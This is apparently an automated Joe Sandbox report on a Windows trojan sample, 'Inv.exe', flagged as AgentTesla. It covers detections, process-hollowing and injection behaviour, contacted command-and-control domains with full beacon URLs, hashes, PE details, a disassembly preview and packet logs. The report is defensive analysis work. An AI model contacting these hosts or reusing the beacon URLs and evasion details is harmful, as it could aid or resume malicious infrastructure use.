          Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion2 | Input Capture1 | Security Software Discovery151 | Remote Desktop Protocol | Input Capture1 | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Shared Modules1 | Logon Script (Windows) | Logon Script (Windows) | Process Injection512 | Security Account Manager | Virtualization/Sandbox Evasion2 | SMB/Windows Admin Shares | Archive Collected Data1 | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information1 | NTDS | Process Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol3 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information3 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing1 | Cached Domain Credentials | System Network Configuration Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Network Connections Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery112 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          Behavior Graph ID: 339347
          Sample: Inv.exe
          Startdate: 13/01/2021
          Architecture: WINDOWS
          Score: 100

          Start
            DNS/IP: www.hwcailing.com
            Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 5 other signatures
            Inv.exe (started)
              Signatures: Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
              Inv.exe (started)
                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                explorer.exe (injected)
                  DNS/IP: www.achonabu.com 172.96.186.206, 49767, 80 SINGLEHOP-LLCUS Canada; nationshiphop.com 34.102.136.180, 49759, 49769, 80 GOOGLEUS United States; 7 other IPs or domains
                  Signatures: System process connects to network (likely due to code injection or exploit)
                  NETSTAT.EXE (started)
                    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    cmd.exe 1 (started)
                      conhost.exe (started)
                  autofmt.exe (started)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Inv.exe | 39% | Virustotal |
          Inv.exe | 46% | ReversingLabs | Win32.Trojan.AgentTesla
          Inv.exe | 100% | Avira | HEUR/AGEN.1106536
          Inv.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          0.2.Inv.exe.d90000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.2.Inv.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner
          www.hwcailing.com | 0% | Virustotal
          millcityloam.com | 0% | Virustotal

          URLs

          Source | Detection | Scanner | Label
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.a-zsolutionsllc.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.nationshiphop.com/hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP | 0% | Avira URL Cloud | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.millcityloam.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.achonabu.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          parkingpage.namecheap.com | 198.54.117.217 | true | false | | high
          www.hwcailing.com | 107.160.136.152 | true | false | | unknown
          millcityloam.com | 34.102.136.180 | true | true | | unknown
          www.achonabu.com | 172.96.186.206 | true | true | | unknown
          nationshiphop.com | 34.102.136.180 | true | true | | unknown
          www.zhaowulu.com | unknown | unknown | true | | unknown
          www.millcityloam.com | unknown | unknown | true | | unknown
          www.nationshiphop.com | unknown | unknown | true | | unknown
          www.a-zsolutionsllc.com | unknown | unknown | true | | unknown
          www.jacmkt.com | unknown | unknown | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.a-zsolutionsllc.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p | true | Avira URL Cloud: safe | unknown
          http://www.nationshiphop.com/hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP | true | Avira URL Cloud: safe | unknown
          http://www.millcityloam.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 | true | Avira URL Cloud: safe | unknown
          http://www.achonabu.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designersG | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designers/? | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/bThe | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers? | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.tiro.com | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.goodfont.co.kr | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.carterandcone.coml | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.sajatypeworks.com | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.typography.netD | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/cThe | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://fontfabrik.com | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.founder.com.cn/cn | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.galapagosdesign.com/DPlease | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers8 | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.%s.comPA | explorer.exe, 00000002.00000002.1048019987.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe | low
          http://www.fonts.com | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.sandoll.co.kr | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.urwpp.deDPlease | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.zhongyicts.com.cn | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.sakkal.com | explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

          Contacted IPs

          Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          198.54.117.217 | unknown | United States | 22612 | NAMECHEAP-NETUS | false
          34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
          172.96.186.206 | unknown | Canada | 32475 | SINGLEHOP-LLCUS | true

                                              General Information

                                              Joe Sandbox Version: 31.0.0 Red Diamond
                                              Analysis ID: 339347
                                              Start date: 13.01.2021
                                              Start time: 21:24:36
                                              Joe Sandbox Product: CloudBasic
                                              Overall analysis duration: 0h 10m 42s
                                              Hypervisor based Inspection enabled: false
                                              Report type: light
                                              Sample file name: Inv.exe
                                              Cookbook file name: default.jbs
                                              Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of new started processes analysed: 19
                                              Number of new started drivers analysed: 0
                                              Number of existing processes analysed: 0
                                              Number of existing drivers analysed: 0
                                              Number of injected processes analysed: 1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode: default
                                              Analysis stop reason: Timeout
                                              Detection: MAL
                                              Classification: mal100.troj.evad.winEXE@8/0@7/3
                                              EGA Information: Failed
                                              HDC Information:
                                              • Successful, ratio: 22.1% (good quality ratio 20%)
                                              • Quality average: 74.8%
                                              • Quality standard deviation: 31.6%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                              • Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.64.90.137, 51.104.139.180, 2.20.142.209, 2.20.142.210, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net

                                              Simulations

                                              Behavior and APIs

                                              No simulations

                                              Joe Sandbox View / Context

                                              IPs


                                              Domains


                                              ASN


                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              No created / dropped files found

                                              Static File Info

                                              General

                                              File type: PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit): 7.638953617352006
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name: Inv.exe
                                              File size: 333824
                                              MD5: a3aba7d40da6c8c86e4e8d035803f314
                                              SHA1: 469b36f05939d6ec6457f1b72ba9f6c7a960be06
                                              SHA256: 1f94eb81e3cde4f677fd210e1ff7f5d06987cbdc2fa7de79e28b224e49244b40
                                              SHA512: 2cfa59a865a8292b98fb3e8e6ae79a4613d773be87c927ba4cc8e0f034010c0e5ebd0b85a74ca02ef59d47335908bcc610a597bc9cbfbfaaf364d76f51fff2fc
                                              SSDEEP: 6144:Sr1I5DbAQcHAORYANcRgOUdQMgV96O5cBTe3pGiO3nhpPgMWOwihgTSE:W1I5fAPHdTdzgV98TetO3hKMMQgT9
                                              File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tj.m'j.m'j.m'.Q.'k.m'.4.'I.m'.4.'r.m'.4.'..m'j.l'..m'...'..m'M7.'k.m'M7.'k.m'M7.'k.m'Richj.m'................PE..L......_...

                                              File Icon

                                              Icon Hash: 00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint: 0x4088a7
                                              Entrypoint Section: .text
                                              Digitally signed: false
                                              Imagebase: 0x400000
                                              Subsystem: windows gui
                                              Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp: 0x5FFEE5F0 [Wed Jan 13 12:22:08 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major: 6
                                              OS Version Minor: 0
                                              File Version Major: 6
                                              File Version Minor: 0
                                              Subsystem Version Major: 6
                                              Subsystem Version Minor: 0
                                              Import Hash: e7da020c2fad0c59a3d5e97971484548

                                              Entrypoint Preview

                                              Instruction
                                              call 00007FEC4CE0A261h
                                              jmp 00007FEC4CE02EC5h
                                              push 00000014h
                                              push 0041D838h
                                              call 00007FEC4CE03768h
                                              call 00007FEC4CE06616h
                                              movzx esi, ax
                                              push 00000002h
                                              call 00007FEC4CE0A1F4h
                                              pop ecx
                                              mov eax, 00005A4Dh
                                              cmp word ptr [00400000h], ax
                                              je 00007FEC4CE02EC6h
                                              xor ebx, ebx
                                              jmp 00007FEC4CE02EF5h
                                              mov eax, dword ptr [0040003Ch]
                                              cmp dword ptr [eax+00400000h], 00004550h
                                              jne 00007FEC4CE02EADh
                                              mov ecx, 0000010Bh
                                              cmp word ptr [eax+00400018h], cx
                                              jne 00007FEC4CE02E9Fh
                                              xor ebx, ebx
                                              cmp dword ptr [eax+00400074h], 0Eh
                                              jbe 00007FEC4CE02ECBh
                                              cmp dword ptr [eax+004000E8h], ebx
                                              setne bl
                                              mov dword ptr [ebp-1Ch], ebx
                                              call 00007FEC4CE07603h
                                              test eax, eax
                                              jne 00007FEC4CE02ECAh
                                              push 0000001Ch
                                              call 00007FEC4CE02F95h
                                              pop ecx
                                              call 00007FEC4CE07C6Ch
                                              test eax, eax
                                              jne 00007FEC4CE02ECAh
                                              push 00000010h
                                              call 00007FEC4CE02F84h
                                              pop ecx
                                              call 00007FEC4CE063A8h
                                              and dword ptr [ebp-04h], 00000000h
                                              call 00007FEC4CE04B43h
                                              call dword ptr [004180C8h]
                                              mov dword ptr [00424080h], eax
                                              call 00007FEC4CE0A252h
                                              mov dword ptr [00422284h], eax
                                              call 00007FEC4CE09E53h
                                              test eax, eax
                                              jns 00007FEC4CE02ECAh
                                              push 00000008h
                                              call 00007FEC4CE01A7Ah
                                              pop ecx
                                              call 00007FEC4CE0A06Fh

                                              Rich Headers

                                              Programming Language:
                                              • [LNK] VS2012 build 50727
                                              • [RES] VS2012 build 50727
                                              • [ C ] VS2012 build 50727

                                              Data Directories

                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1db94 | 0xdc | .rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x25000 | 0x1a78 | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x27000 | 0x1150 | .reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1d6e0 | 0x40 | .rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x18000 | 0x1c8 | .rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                              Sections

                                              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x1000 | 0x16d9a | 0x16e00 | False | 0.571176997951 | data | 6.6738730891 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rdata | 0x18000 | 0x64f8 | 0x6600 | False | 0.572227328431 | data | 6.01779519415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data | 0x1f000 | 0x5098 | 0x3400 | False | 0.285531850962 | data | 4.70097691284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .rsrc | 0x25000 | 0x1a78 | 0x1c00 | False | 0.9453125 | data | 7.75466359197 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc | 0x27000 | 0x1798 | 0x1800 | False | 0.606770833333 | data | 5.55476531064 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              Name | RVA | Size | Type | Language | Country
                                              RT_RCDATA | 0x25070 | 0x1a05 | data | English | United States

                                              Imports

                                              DLL | Imports
                                              KERNEL32.dll | RaiseException, ReadConsoleW, ReadFile, CreateFileW, WriteConsoleW, GetStringTypeW, LCMapStringEx, SetConsoleCursorPosition, LoadLibraryW, GetModuleHandleW, HeapReAlloc, HeapSize, OutputDebugStringW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, SetStdHandle, WideCharToMultiByte, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetProcessHeap, HeapAlloc, GetStdHandle, GetTickCount64, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetModuleFileNameA, GetCurrentThreadId, SetLastError, GetCPInfo, GetOEMCP, GetACP, EncodePointer, DecodePointer, GetLastError, InterlockedDecrement, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, MultiByteToWideChar, GetLocalTime, GetCommandLineA, IsDebuggerPresent, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, CloseHandle, HeapFree, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetFileType, DeleteCriticalSection, InitOnceExecuteOnce, GetStartupInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, GetCurrentProcess, TerminateProcess, WriteFile, GetModuleFileNameW, Sleep, LoadLibraryExW, InterlockedIncrement, IsValidCodePage, SetEndOfFile
                                              msi.dll |
                                              loadperf.dll | LoadPerfCounterTextStringsA, UnloadPerfCounterTextStringsW, UnloadPerfCounterTextStringsA
                                              MSVFW32.dll | StretchDIB
                                              AVIFIL32.dll | AVIFileExit, AVIStreamReadData
                                              pdh.dll | PdhEnumObjectsW, PdhSetQueryTimeRange, PdhGetDllVersion
                                              WSOCK32.dll | WSASetBlockingHook, WSACancelAsyncRequest, bind, ord1104, ord1108, ord1130
                                              GDI32.dll | StartDocW, GdiGetSpoolFileHandle, PolyBezier
                                              MAPI32.dll |
                                              MSACM32.dll | acmDriverPriority, acmFilterTagDetailsA

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/13/21-21:26:33.276386 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49759 | 34.102.136.180 | 192.168.2.4
01/13/21-21:28:17.122550 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49769 | 34.102.136.180 | 192.168.2.4

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2021 21:26:33.097670078 CET | 49759 | 80 | 192.168.2.4 | 34.102.136.180
Jan 13, 2021 21:26:33.137716055 CET | 80 | 49759 | 34.102.136.180 | 192.168.2.4
Jan 13, 2021 21:26:33.137829065 CET | 49759 | 80 | 192.168.2.4 | 34.102.136.180
Jan 13, 2021 21:26:33.137989044 CET | 49759 | 80 | 192.168.2.4 | 34.102.136.180
Jan 13, 2021 21:26:33.177892923 CET | 80 | 49759 | 34.102.136.180 | 192.168.2.4
Jan 13, 2021 21:26:33.276386023 CET | 80 | 49759 | 34.102.136.180 | 192.168.2.4
Jan 13, 2021 21:26:33.276506901 CET | 80 | 49759 | 34.102.136.180 | 192.168.2.4
Jan 13, 2021 21:26:33.276700974 CET | 49759 | 80 | 192.168.2.4 | 34.102.136.180
Jan 13, 2021 21:26:33.276757002 CET | 49759 | 80 | 192.168.2.4 | 34.102.136.180
Jan 13, 2021 21:26:33.317466021 CET | 80 | 49759 | 34.102.136.180 | 192.168.2.4
Jan 13, 2021 21:27:14.839076042 CET | 49767 | 80 | 192.168.2.4 | 172.96.186.206
Jan 13, 2021 21:27:14.963711977 CET | 80 | 49767 | 172.96.186.206 | 192.168.2.4
Jan 13, 2021 21:27:14.964004040 CET | 49767 | 80 | 192.168.2.4 | 172.96.186.206
Jan 13, 2021 21:27:14.964339018 CET | 49767 | 80 | 192.168.2.4 | 172.96.186.206
Jan 13, 2021 21:27:15.088922024 CET | 80 | 49767 | 172.96.186.206 | 192.168.2.4
Jan 13, 2021 21:27:15.469309092 CET | 49767 | 80 | 192.168.2.4 | 172.96.186.206
Jan 13, 2021 21:27:15.639761925 CET | 80 | 49767 | 172.96.186.206 | 192.168.2.4
Jan 13, 2021 21:27:17.656807899 CET | 80 | 49767 | 172.96.186.206 | 192.168.2.4
Jan 13, 2021 21:27:17.656835079 CET | 80 | 49767 | 172.96.186.206 | 192.168.2.4
Jan 13, 2021 21:27:17.656851053 CET | 80 | 49767 | 172.96.186.206 | 192.168.2.4
Jan 13, 2021 21:27:17.656866074 CET | 80 | 49767 | 172.96.186.206 | 192.168.2.4
Jan 13, 2021 21:27:17.656888962 CET | 80 | 49767 | 172.96.186.206 | 192.168.2.4
Jan 13, 2021 21:27:17.656908989 CET | 80 | 49767 | 172.96.186.206 | 192.168.2.4
Jan 13, 2021 21:27:17.656928062 CET | 80 | 49767 | 172.96.186.206 | 192.168.2.4
Jan 13, 2021 21:27:17.656944990 CET | 80 | 49767 | 172.96.186.206 | 192.168.2.4
Jan 13, 2021 21:27:17.656949043 CET | 49767 | 80 | 192.168.2.4 | 172.96.186.206
Jan 13, 2021 21:27:17.656961918 CET | 80 | 49767 | 172.96.186.206 | 192.168.2.4
Jan 13, 2021 21:27:17.656975031 CET | 80 | 49767 | 172.96.186.206 | 192.168.2.4
Jan 13, 2021 21:27:17.656976938 CET | 49767 | 80 | 192.168.2.4 | 172.96.186.206
Jan 13, 2021 21:27:17.657040119 CET | 49767 | 80 | 192.168.2.4 | 172.96.186.206
Jan 13, 2021 21:27:17.657052040 CET | 49767 | 80 | 192.168.2.4 | 172.96.186.206
Jan 13, 2021 21:27:56.262149096 CET | 49768 | 80 | 192.168.2.4 | 198.54.117.217
Jan 13, 2021 21:27:56.454626083 CET | 80 | 49768 | 198.54.117.217 | 192.168.2.4
Jan 13, 2021 21:27:56.454735041 CET | 49768 | 80 | 192.168.2.4 | 198.54.117.217
Jan 13, 2021 21:27:56.454940081 CET | 49768 | 80 | 192.168.2.4 | 198.54.117.217
Jan 13, 2021 21:27:56.647383928 CET | 80 | 49768 | 198.54.117.217 | 192.168.2.4
Jan 13, 2021 21:27:56.647411108 CET | 80 | 49768 | 198.54.117.217 | 192.168.2.4
Jan 13, 2021 21:28:16.939611912 CET | 49769 | 80 | 192.168.2.4 | 34.102.136.180
Jan 13, 2021 21:28:16.979912996 CET | 80 | 49769 | 34.102.136.180 | 192.168.2.4
Jan 13, 2021 21:28:16.980845928 CET | 49769 | 80 | 192.168.2.4 | 34.102.136.180
Jan 13, 2021 21:28:16.982839108 CET | 49769 | 80 | 192.168.2.4 | 34.102.136.180
Jan 13, 2021 21:28:17.023057938 CET | 80 | 49769 | 34.102.136.180 | 192.168.2.4
Jan 13, 2021 21:28:17.122550011 CET | 80 | 49769 | 34.102.136.180 | 192.168.2.4
Jan 13, 2021 21:28:17.122571945 CET | 80 | 49769 | 34.102.136.180 | 192.168.2.4
Jan 13, 2021 21:28:17.123596907 CET | 49769 | 80 | 192.168.2.4 | 34.102.136.180
Jan 13, 2021 21:28:17.124424934 CET | 49769 | 80 | 192.168.2.4 | 34.102.136.180
Jan 13, 2021 21:28:17.165519953 CET | 80 | 49769 | 34.102.136.180 | 192.168.2.4

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2021 21:25:26.313123941 CET | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:25:26.361131907 CET | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:25:27.104875088 CET | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:25:27.158407927 CET | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:25:28.452390909 CET | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:25:28.500507116 CET | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:25:29.828567982 CET | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:25:29.885067940 CET | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:25:31.100845098 CET | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:25:31.151740074 CET | 53 | 56627 | 8.8.8.8 | 192.168.2.4
